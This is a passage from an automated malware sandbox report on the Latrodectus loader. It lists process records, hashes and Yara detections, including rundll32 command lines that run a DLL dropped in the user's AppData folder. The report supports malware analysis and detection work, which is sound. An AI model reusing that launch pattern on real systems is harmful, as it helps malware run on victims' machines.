                                                                                                                  Imagebase:0x7ff67a3b0000
                                                                                                                  File size:570'736 bytes
                                                                                                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:21
                                                                                                                  Start time:00:04:08
                                                                                                                  Start date:11/05/2024
                                                                                                                  Path:C:\Windows\System32\WerFault.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\WerFault.exe -u -p 7288 -s 344
Imagebase: 0x7ff67a3b0000
File size: 570'736 bytes
MD5 hash: FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 22
Start time: 00:04:16
Start date: 11/05/2024
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0x7ff72b770000
File size: 5'141'208 bytes
MD5 hash: 662F4F92FDE3557E86D110526BB578D5
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000016.00000003.2703639060.0000000003250000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000016.00000000.1844669819.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000016.00000003.2807505534.0000000008820000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000016.00000002.2945149697.000000000B52C000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000016.00000002.2938259956.0000000003140000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
Has exited: false

Target ID: 26
Start time: 00:04:29
Start date: 11/05/2024
Path: C:\Windows\System32\rundll32.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow
Imagebase: 0x7ff74e4b0000
File size: 71'680 bytes
MD5 hash: EF3179D498793BF4234F708D3BE28633
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 27
Start time: 00:04:37
Start date: 11/05/2024
Path: C:\Windows\System32\rundll32.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow
Imagebase: 0x7ff74e4b0000
File size: 71'680 bytes
MD5 hash: EF3179D498793BF4234F708D3BE28633
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

No disassembly